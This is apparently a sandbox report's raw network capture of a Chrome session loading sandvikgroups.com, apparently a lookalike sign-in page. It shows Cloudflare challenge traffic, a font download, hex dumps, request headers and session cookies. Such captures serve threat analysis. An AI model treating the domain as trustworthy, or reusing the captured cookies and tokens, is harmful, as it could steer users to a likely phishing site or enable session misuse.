                                        Data Ascii: LUj4Oo-1736283984-1.2.1.1-82APSRQXvedJiL9MxhtO9ZhAq3C5ZlHFSaT7PSfx9x6sKmwRld7O9SoWJ.tut9pzI.x3JAsxD_2buBHNHXSwj8fTtI3iv2eEIG8rAx.czZBRv_Q6EOMrubL65EiNOoDS5NH6p46eR_hgEcf.u.hIK4dFoKvmm9SOgWrsyHZ4K01FopHGsaN8Kph7fGEJF8_9_uJgkGHU9tCsx_WsWIQlYV_M8BDd3QmZLx4jS
                                        2025-01-07 21:06:24 UTC1369INData Raw: 6a 4b 31 46 4a 67 5f 53 6c 6a 43 31 53 44 5f 6f 6c 72 32 67 6d 72 57 52 38 4e 44 4a 54 34 44 53 32 78 63 4d 41 6c 42 5a 48 36 4f 35 34 71 71 41 30 45 5f 74 4c 39 74 35 74 65 79 36 2e 74 68 59 52 48 4b 44 42 70 38 6c 62 73 6d 4b 35 55 5a 4e 51 58 55 4d 4e 4f 55 62 74 44 6a 57 37 63 79 4b 5f 59 38 36 72 34 6e 55 53 66 4f 49 6c 46 52 51 53 39 6d 77 68 6d 72 36 37 4c 4b 74 79 4a 37 4b 2e 74 70 48 4a 50 73 6f 5a 30 62 79 78 79 74 7a 5f 38 2e 61 74 4d 79 6e 61 44 66 78 6f 44 76 31 53 33 47 7a 6f 6e 68 4d 33 4e 43 64 71 59 76 2e 4a 6e 48 31 5a 54 68 56 4b 4d 48 67 79 4f 65 4f 5a 6e 64 54 58 6f 6c 30 79 72 42 77 55 6d 58 44 37 56 33 7a 4b 56 63 6a 6c 38 78 52 74 54 53 50 70 38 43 78 4f 42 51 41 79 43 75 56 71 4f 6b 4f 68 35 30 62 56 6a 37 41 4f 43 53 4c 35 76 56
                                        Data Ascii: jK1FJg_SljC1SD_olr2gmrWR8NDJT4DS2xcMAlBZH6O54qqA0E_tL9t5tey6.thYRHKDBp8lbsmK5UZNQXUMNOUbtDjW7cyK_Y86r4nUSfOIlFRQS9mwhmr67LKtyJ7K.tpHJPsoZ0byxytz_8.atMynaDfxoDv1S3GzonhM3NCdqYv.JnH1ZThVKMHgyOeOZndTXol0yrBwUmXD7V3zKVcjl8xRtTSPp8CxOBQAyCuVqOkOh50bVj7AOCSL5vV
                                        2025-01-07 21:06:24 UTC1369INData Raw: 77 4c 69 68 55 4b 37 59 38 50 44 76 55 39 57 32 6f 48 75 65 46 33 55 6e 76 64 4f 62 45 75 57 33 54 54 78 4a 50 55 45 54 57 6d 61 4e 7a 5f 62 69 30 69 71 65 6e 32 75 75 7a 4c 47 30 48 45 4f 76 59 4c 76 37 67 32 79 61 4f 6e 6c 42 63 65 31 59 34 66 78 70 53 4f 45 61 66 58 31 52 69 44 36 4f 48 30 5a 6a 63 47 6f 44 57 36 49 47 6f 58 36 32 54 69 79 72 2e 52 75 5a 78 4d 35 4e 63 56 70 47 4e 37 6e 4d 52 4e 61 44 53 36 50 6c 36 49 41 53 79 79 42 58 59 6e 61 7a 65 6d 44 6a 75 73 47 5f 48 75 53 6b 6a 56 6b 52 47 32 43 59 68 45 4c 62 72 32 56 43 70 4a 47 77 72 46 59 36 59 43 44 45 33 61 68 5f 6c 35 72 54 41 35 77 5f 38 32 56 63 57 59 68 35 59 79 6b 59 4a 51 37 69 41 44 73 44 4b 56 71 70 5f 52 7a 31 6a 36 64 65 6d 69 4f 34 4c 32 55 78 68 53 78 73 75 59 46 71 38 33 4c
                                        Data Ascii: wLihUK7Y8PDvU9W2oHueF3UnvdObEuW3TTxJPUETWmaNz_bi0iqen2uuzLG0HEOvYLv7g2yaOnlBce1Y4fxpSOEafX1RiD6OH0ZjcGoDW6IGoX62Tiyr.RuZxM5NcVpGN7nMRNaDS6Pl6IASyyBXYnazemDjusG_HuSkjVkRG2CYhELbr2VCpJGwrFY6YCDE3ah_l5rTA5w_82VcWYh5YykYJQ7iADsDKVqp_Rz1j6demiO4L2UxhSxsuYFq83L
                                        2025-01-07 21:06:24 UTC1369INData Raw: 4a 51 35 51 41 79 41 59 4d 5a 59 47 34 56 49 68 36 6d 67 64 6a 47 74 47 66 45 34 73 67 6e 6f 4c 33 4b 64 73 63 51 30 66 52 74 62 51 71 61 72 69 74 6d 39 43 54 42 5a 66 48 41 77 54 52 4a 51 69 4c 42 42 46 4c 69 32 67 77 4e 7a 73 38 4a 4a 50 36 67 70 38 73 70 4a 36 49 47 39 70 50 54 70 4e 67 39 68 53 61 43 62 46 34 56 46 45 79 71 49 43 74 32 5a 5a 37 6a 59 5f 2e 78 79 42 61 70 4b 35 64 70 62 6b 4e 76 46 72 78 33 69 70 39 4b 30 49 63 53 70 44 30 48 33 79 51 46 74 55 36 48 69 48 38 53 33 52 69 61 4d 55 5f 47 78 4c 73 73 57 59 5f 73 63 56 4b 62 6a 69 5a 59 67 38 4d 6d 79 4e 50 72 69 67 34 4c 70 61 44 42 56 61 32 54 6e 48 54 5f 61 4b 66 6f 78 5a 73 5f 78 56 61 51 41 44 72 4f 45 54 78 6c 55 41 37 30 31 63 64 75 6e 56 43 77 32 76 50 51 35 49 7a 46 59 79 32 6a 71
                                        Data Ascii: JQ5QAyAYMZYG4VIh6mgdjGtGfE4sgnoL3KdscQ0fRtbQqaritm9CTBZfHAwTRJQiLBBFLi2gwNzs8JJP6gp8spJ6IG9pPTpNg9hSaCbF4VFEyqICt2ZZ7jY_.xyBapK5dpbkNvFrx3ip9K0IcSpD0H3yQFtU6HiH8S3RiaMU_GxLssWY_scVKbjiZYg8MmyNPrig4LpaDBVa2TnHT_aKfoxZs_xVaQADrOETxlUA701cdunVCw2vPQ5IzFYy2jq
                                        2025-01-07 21:06:24 UTC618INData Raw: 74 68 20 2d 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 2e 6c 65 6e 67 74 68 29 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 3f 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 69 66 20 28 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 20 26 26 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 29 20 7b 76 61 72 20 6f 67 55 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 3b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75
                                        Data Ascii: th - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, nu
                                        2025-01-07 21:06:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        44192.168.2.449816188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:25 UTC1893OUTGET /?get_link=ch_files/fonts/lighter_font.woff HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Origin: https://sandvikgroups.com
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: font
                                        Referer: https://sandvikgroups.com/?get_link=ch_files/ca/csspage2.php?page=signin&t=qrd0fg2hx9ez7rr
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
                                        2025-01-07 21:06:25 UTC1261INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:25 GMT
                                        Content-Type: application/x-font-woff
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Content-Type-Options: nosniff
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        X-XSS-Protection: 1; mode=block
                                        Cache-Control: max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, public, immutable
                                        Cache-Control: max-age=0, private, no-cache, no-store, must-revalidate
                                        Pragma: public
                                        Pragma: no-cache
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        X-Nginx-Upstream-Cache-Status: BYPASS
                                        X-Server-Powered-By: Engintron
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFkuBIwHwWxemX1d%2FEVtAAimgAeXL5mi%2Fudf63rQp4GrYM2oPUQh54XJy6ssKXJpwYs%2BB9SslD5pX6wujgoCmangAExN0dhzPziXoKHDh9weTt0t%2BCBh0UqCB8v%2FHgTtt%2Fnb5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e95b5ce78c15-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1978&min_rtt=1968&rtt_var=758&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2515&delivery_rate=1424390&cwnd=238&unsent_bytes=0&cid=a6c205afcec3aad5&ts=529&x=0"
                                        2025-01-07 21:06:25 UTC108INData Raw: 33 35 33 39 0d 0a 77 4f 46 46 00 01 00 00 00 00 d4 48 00 0b 00 00 00 00 d3 fc 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4f 53 2f 32 00 00 01 08 00 00 00 60 00 00 00 60 17 12 0e 65 63 6d 61 70 00 00 01 68 00 00 01 cc 00 00 01 cc 9c 00 ca ac 67 61 73 70 00 00 03 34 00 00 00 08 00 00 00 08 00 00
                                        Data Ascii: 3539wOFFHOS/2``ecmaphgasp4
                                        2025-01-07 21:06:25 UTC1369INData Raw: 00 10 67 6c 79 66 00 00 03 3c 00 00 ca 84 00 00 ca 84 b0 7a 2a 5b 68 65 61 64 00 00 cd c0 00 00 00 36 00 00 00 36 21 80 29 2a 68 68 65 61 00 00 cd f8 00 00 00 24 00 00 00 24 17 d2 14 a8 68 6d 74 78 00 00 ce 1c 00 00 02 ec 00 00 02 ec f7 3d 35 d2 6c 6f 63 61 00 00 d1 08 00 00 01 78 00 00 01 78 bd 92 ef 42 6d 61 78 70 00 00 d2 80 00 00 00 20 00 00 00 20 00 cd 02 41 6e 61 6d 65 00 00 d2 a0 00 00 01 86 00 00 01 86 99 4a 09 fb 70 6f 73 74 00 00 d4 28 00 00 00 20 00 00 00 20 00 03 00 00 00 03 04 1b 01 90 00 05 00 00 02 99 02 cc 00 00 00 8f 02 99 02 cc 00 00 01 eb 00 33 01 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 10 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 40 00 00 f1 20 03 c0 ff c0 00 40 03 c0 00 40 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii: glyf<z*[head66!)*hhea$$hmtx=5locaxxBmaxp AnameJpost( 3@ @@
                                        2025-01-07 21:06:25 UTC1369INData Raw: 01 09 6a 5d 5d 8b 29 28 28 29 8b 5d 5d 6a 6a 5d 5d 8b 29 28 28 29 8b 5d 5d 6a 65 58 59 84 27 26 26 27 84 59 58 65 65 58 59 84 27 26 26 27 84 59 58 ee 02 04 01 ed 53 73 24 39 31 24 26 5d 88 5b 1d 35 15 15 ee 01 02 03 02 02 27 02 06 03 ad 30 1b 57 75 50 22 21 2e 34 2a 7b 5e 23 22 ca 02 e9 04 09 05 0a 14 09 e7 1e 1f 02 4c 06 01 05 7d 03 07 04 04 09 04 14 03 04 03 03 7c 03 07 04 05 08 04 14 9a 10 77 11 76 01 65 28 29 8b 5d 5d 6a 6a 5d 5d 8b 29 28 28 29 8b 5d 5d 6a 6a 5d 5d 8b 29 28 fc 19 26 27 84 59 58 65 65 58 59 84 27 26 26 27 84 59 58 65 65 58 59 84 27 26 00 00 00 05 00 33 ff ff 03 cf 03 81 00 2d 00 44 00 50 00 6a 00 6f 00 00 25 27 2e 01 27 01 36 37 36 26 27 26 27 2e 01 23 22 06 07 0e 01 17 1e 01 17 1e 01 33 32 36 37 01 1e 01 1f 01 30 32 31 32 36 3f 01 3e
                                        Data Ascii: j]])(()]]jj]])(()]]jeXY'&&'YXeeXY'&&'YXSs$91$&][5'0WuP"!.4*{^#"L}|wve()]]jj]])(()]]jj]])(&'YXeeXY'&&'YXeeXY'&3-DPjo%'.'676&'&'.#"326702126?>
                                        2025-01-07 21:06:25 UTC1369INData Raw: 11 33 32 36 37 3e 01 35 11 34 26 23 25 33 15 23 35 07 21 15 23 35 34 26 2b 01 22 06 1d 01 23 35 05 15 23 35 05 35 33 15 23 30 26 23 01 21 11 33 15 14 16 33 32 36 3d 01 33 15 14 16 3b 01 32 36 3d 01 33 15 14 16 33 32 36 3d 01 33 11 13 23 35 33 03 b0 fe df 0a 08 ee 08 0b fe d4 07 0b 03 03 02 07 03 01 0b 07 03 39 08 0a 01 04 07 03 02 03 0b 07 fd f1 ca ca c8 02 4e d8 0b 08 81 08 0b cf 01 51 5d fe 96 51 4f 01 01 03 27 fc ec 3e 0b 08 07 0b cf 0b 08 81 08 0b d8 0b 07 08 0b 3e 13 51 51 02 ba 63 08 0a 0a 08 63 0b 08 fe f5 04 06 03 02 03 fe d9 08 0a 0a 08 01 26 03 02 03 07 03 01 0c 08 0b 51 51 51 76 e7 1a 07 0b 0b 07 1a e7 e0 39 39 06 e6 e7 01 fe c6 01 15 24 08 0b 0b 08 24 21 07 0b 0b 07 21 24 08 0b 0b 08 24 fe eb 01 39 e7 00 00 00 00 05 00 3e 00 4e 03 c2 03 32 00
                                        Data Ascii: 3267>54&#%3#5!#54&+"#5#553#0&#!3326=3;26=3326=3#539NQ]QO'>>QQcc&QQQv99$$!!$$9>N2
                                        2025-01-07 21:06:25 UTC1369INData Raw: 34 26 2b 01 22 06 1d 01 14 16 33 37 33 15 23 03 a1 fe e0 0b 08 fd f1 08 0b 0b 08 02 0f 01 33 08 0b 0b 08 fe b9 fe 19 01 e7 01 33 fe f5 01 0b fd 56 53 08 0c 0c 08 53 08 0c 0c 08 13 2c 2c 13 53 08 0c 0c 08 53 08 0c 0c 08 13 2c 2c 13 53 08 0c 0c 08 53 08 0c 0c 08 13 2c 2c a1 53 08 0c 0c 08 53 08 0c 0c 1c 2b 2b 14 53 08 0c 0c 08 53 08 0c 0c 1c 2b 2b 14 53 08 0c 0c 08 53 08 0c 0c 1c 2b 2b 01 33 53 08 0c 0c 08 53 08 0c 0c 08 14 2b 2b 02 01 01 3b 09 0b 0b 09 fd 08 09 0b 0b 09 01 aa 08 0b fe 56 02 d2 fd 2e 01 83 fe 7d 02 01 0c 08 52 09 0b 0b 09 52 08 0c 53 2b cc 0b 08 53 08 0b 0b 08 53 08 0b 52 2b cc 0b 08 53 08 0b 0b 08 53 08 0b 52 2b 01 22 0c 08 52 09 0b 0b 09 52 08 0c 53 2b cc 0b 08 53 08 0b 0b 08 53 08 0b 52 2b cc 0b 08 53 08 0b 0b 08 53 08 0b 52 2b 27 0c 08
                                        Data Ascii: 4&+"373#33VSS,,SS,,SS,,SS++SS++SS++3SS++;V.}RRS+SSR+SSR+"RRS+SSR+SSR+'
                                        2025-01-07 21:06:25 UTC1369INData Raw: 17 10 11 17 02 0b ba 06 05 05 06 0c 20 0b fd 04 05 02 01 01 02 01 02 04 02 fd 05 0f 07 04 06 06 0b 21 0b ba 17 10 02 2c 11 16 16 11 fd fc b9 06 0f 07 08 0e 06 0b 0b fd 04 09 06 01 01 01 05 09 05 01 01 01 04 05 03 fc 06 05 00 05 00 03 00 31 04 00 03 4c 00 64 00 94 00 98 00 bc 00 c8 00 00 01 38 01 31 2e 01 27 26 36 37 3e 01 33 32 30 31 38 01 33 38 01 31 32 16 17 16 36 37 36 26 27 2e 01 27 35 2e 01 23 22 06 15 17 0e 01 07 0e 01 17 1e 01 17 38 01 31 1e 01 17 16 06 07 0e 01 23 2a 01 15 30 22 31 2e 01 27 26 06 07 06 16 17 1e 01 17 15 14 16 33 30 32 31 32 36 3d 01 3e 01 37 3e 01 27 2e 01 27 17 34 27 2e 01 27 26 23 22 06 07 27 2e 01 07 22 06 07 05 14 22 0f 01 0e 01 17 1e 01 33 32 36 3f 01 11 14 16 33 25 32 36 37 3e 01 35 11 3e 01 35 01 35 33 07 05 23 35 34 26 2b
                                        Data Ascii: !,1Ld81.'&67>320183812676&'.'5.#"81#*0"1.'&302126=>7>'.'4'.'&#"'.""326?3%267>5>553#54&+
                                        2025-01-07 21:06:25 UTC1369INData Raw: 27 84 59 58 02 95 07 05 fe b2 02 05 02 47 05 07 07 05 01 9e 05 07 fe 63 3a 7e 22 7e 01 29 ab da c8 10 19 10 a4 b4 d1 bd 6a 59 2a 49 02 03 02 01 64 a6 fe 7b ca 44 35 fe bd 01 66 01 45 34 99 01 43 28 29 8b 5d 5d 6a 6a 5d 5d 8b 29 28 28 29 8b 5d 5d 6a 6a 5d 5d 8b 29 28 fc 19 26 27 84 59 58 65 65 58 59 84 27 26 26 27 84 59 58 65 65 58 59 84 27 26 00 00 00 09 00 01 00 94 04 00 02 ec 00 14 00 1d 00 28 00 2d 00 31 00 36 00 3a 00 3f 00 45 00 00 01 21 22 06 15 11 06 14 17 15 14 16 33 21 32 36 35 11 34 26 23 07 14 22 0f 02 35 33 15 25 33 15 27 2e 01 23 22 06 0f 01 07 27 35 33 15 07 17 15 23 01 37 17 11 23 01 15 07 11 11 37 15 23 35 05 11 3f 01 11 23 03 ef fc 23 07 0a 01 01 0a 07 03 dd 07 0a 0a 07 11 01 01 5f 4e af fe 37 f8 4c 02 06 04 04 07 02 93 23 f8 f8 f8 f8 f8
                                        Data Ascii: 'YXGc:~"~)jY*Id{D5fE4C()]]jj]])(()]]jj]])(&'YXeeXY'&&'YXeeXY'&(-16:?E!"3!2654&#"53%3'.#"'53#7#7#5?##_N7L#
                                        2025-01-07 21:06:25 UTC1369INData Raw: 03 03 01 2b 02 06 03 04 09 02 05 03 fd 78 01 84 02 1f fd c5 01 b2 04 07 03 03 03 01 76 01 42 02 05 0c 05 fe ea 72 08 0b 0b 08 9a 01 98 08 0b 0b 08 98 97 08 0b 0b 08 97 01 03 03 03 07 03 01 36 6d 3b 3b ed 8c 0b 08 61 08 0b 8f 01 0c c7 cf 01 02 01 84 ea 03 07 03 03 03 01 01 01 01 01 01 c5 01 01 01 01 03 01 01 02 01 01 fd 68 04 07 03 02 03 01 0b 08 b7 03 02 03 07 04 01 24 1d 02 02 04 05 06 10 01 44 85 fd 68 01 02 71 03 03 02 07 04 b3 bd 2e 02 03 03 bd 01 0b 08 08 0b 3a 0c 08 07 0c 01 3b 0c 08 07 0c 01 4d 04 07 03 02 03 02 a4 01 1c 4f 4f 52 65 08 0c 01 0b 08 64 01 01 28 09 87 91 fe d7 00 05 00 9f ff fe 03 61 03 82 00 6d 00 70 00 7a 00 aa 00 af 00 00 01 21 22 06 23 38 01 31 30 06 31 38 01 31 22 30 15 30 22 31 30 22 15 22 30 31 30 22 31 14 30 23 38 01 15 22 30
                                        Data Ascii: +xvBr6m;;ah$Dhq.:;MOORed(ampz!"#810181"00"10""010"10#8"0
                                        2025-01-07 21:06:25 UTC1369INData Raw: 22 26 35 13 21 32 30 31 33 1e 01 1d 01 23 22 06 15 14 16 3b 01 15 37 23 22 26 35 34 36 3b 01 32 16 15 14 06 27 22 06 15 14 16 33 32 36 35 34 26 02 00 6a 5d 5d 8b 29 28 28 29 8b 5d 5d 6a 6a 5d 5d 8b 29 28 28 29 8b 5d 5d 6a 65 58 59 84 27 26 26 27 84 59 58 65 65 58 59 84 27 26 26 27 84 59 58 f5 23 20 18 01 01 29 06 23 16 05 08 03 fe 86 1a 1c 01 29 29 01 d0 1b 26 23 1c 27 27 1c fd b7 01 79 03 05 03 0d 16 03 fe 55 01 01 01 1f 02 11 10 01 aa fe ed 01 76 18 10 fe 30 23 16 01 02 04 01 09 0f 13 2a 1c 28 28 1c 2a 3c 66 12 19 19 12 66 11 19 19 14 08 0b 0b 08 08 0b 0b 03 c0 28 29 8b 5d 5d 6a 6a 5d 5d 8b 29 28 28 29 8b 5d 5d 6a 6a 5d 5d 8b 29 28 fc 19 26 27 84 59 58 65 65 58 59 84 27 26 26 27 84 59 58 65 65 58 59 84 27 26 02 13 43 18 25 04 5b 01 01 01 16 1b 01 01 4a
                                        Data Ascii: "&5!2013#";7#"&546;2'"32654&j]])(()]]jj]])(()]]jeXY'&&'YXeeXY'&&'YX# )#))&#''yUv0#*((*<ff()]]jj]])(()]]jj]])(&'YXeeXY'&&'YXeeXY'&C%[J
                                        2025-01-07 21:06:25 UTC1369INData Raw: 0d 13 13 0d 01 f4 0d 13 13 03 72 14 0e fe 37 0e 14 8a 50 09 09 0a 1a 0a 87 05 05 05 05 87 0a 1a 0a 09 09 50 8a 14 0e 01 c9 0e 14 fe 37 01 85 ad 14 0e 0e 14 14 0e 0e 14 3d 14 0e 0e 14 14 0e 0e 14 fe 0a 13 0d 0d 13 13 0d 0d 13 00 00 00 00 01 00 02 01 43 03 fe 02 3b 00 0f 00 00 01 25 2e 01 37 3e 01 17 05 25 36 16 17 16 06 07 02 02 fe 1e 12 12 06 06 23 12 01 c5 01 c1 12 22 07 06 12 12 01 43 9e 06 22 12 13 11 06 94 96 06 11 12 13 22 06 00 00 03 00 00 00 22 04 00 03 5e 00 3e 00 68 00 88 00 00 01 2e 01 27 2e 01 27 2e 01 23 21 22 06 07 0e 01 07 0e 01 07 0e 01 15 14 16 17 1e 01 17 1e 01 17 1e 01 3b 01 17 1e 01 33 32 36 37 3e 01 3f 01 33 32 36 37 3e 01 37 3e 01 37 3e 01 35 34 26 27 03 0e 01 2b 01 22 06 0f 01 27 2e 01 2b 01 22 26 27 2e 01 35 34 36 37 3e 01 37 3e 01
                                        Data Ascii: r7PP7=C;%.7>%6#"C"""^>h.'.'.#!";3267>?3267>7>7>54&'+"'.+"&'.5467>7>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        45192.168.2.449817188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:25 UTC1588OUTPOST /cdn-cgi/challenge-platform/h/g/jsd/r/8fe6e9464fad422f HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        Content-Length: 15828
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-platform: "Windows"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Content-Type: application/json
                                        Accept: */*
                                        Origin: https://sandvikgroups.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
                                        2025-01-07 21:06:25 UTC15828OUTData Raw: 7b 22 77 70 22 3a 22 46 66 77 4a 42 76 62 72 42 59 77 42 61 51 44 62 6c 62 4f 4e 78 4a 76 50 4e 70 4d 4e 35 69 35 33 33 76 72 62 65 2b 4e 6f 5a 50 48 5a 45 77 4e 4b 6f 32 30 44 5a 59 62 2d 4e 61 6c 77 31 52 66 66 4e 70 63 33 4e 71 4e 33 50 33 77 62 4e 43 33 62 57 44 54 4a 63 59 66 68 41 4c 4a 6f 5a 6b 66 4d 70 39 2d 4f 51 31 6a 4a 57 6b 42 36 4d 75 62 39 2b 6f 63 35 4e 42 77 77 47 35 4b 76 68 52 4e 56 31 52 45 7a 68 4e 7a 4a 51 4b 4e 76 36 77 4e 35 4a 76 76 4a 6b 61 4a 35 4e 62 5a 4e 78 59 55 4e 62 75 68 4e 6d 34 72 70 31 66 32 62 70 63 52 77 4e 76 34 68 4e 76 44 30 78 4e 30 76 4e 62 68 43 45 58 77 4c 2d 4d 50 76 31 76 62 7a 57 4d 66 2b 42 6b 53 37 7a 6f 4e 69 4a 76 35 73 79 66 4e 72 55 66 5a 51 45 6f 24 43 31 4e 30 37 7a 63 6b 69 70 4a 4e 58 63 69 45 35
                                        Data Ascii: {"wp":"FfwJBvbrBYwBaQDblbONxJvPNpMN5i533vrbe+NoZPHZEwNKo20DZYb-Nalw1RffNpc3NqN3P3wbNC3bWDTJcYfhALJoZkfMp9-OQ1jJWkB6Mub9+oc5NBwwG5KvhRNV1REzhNzJQKNv6wN5JvvJkaJ5NbZNxYUNbuhNm4rp1f2bpcRwNv4hNvD0xN0vNbhCEXwL-MPv1vbzWMf+BkS7zoNiJv5syfNrUfZQEo$C1N07zckipJNXciE5
                                        2025-01-07 21:06:25 UTC1360INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:25 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 0
                                        Connection: close
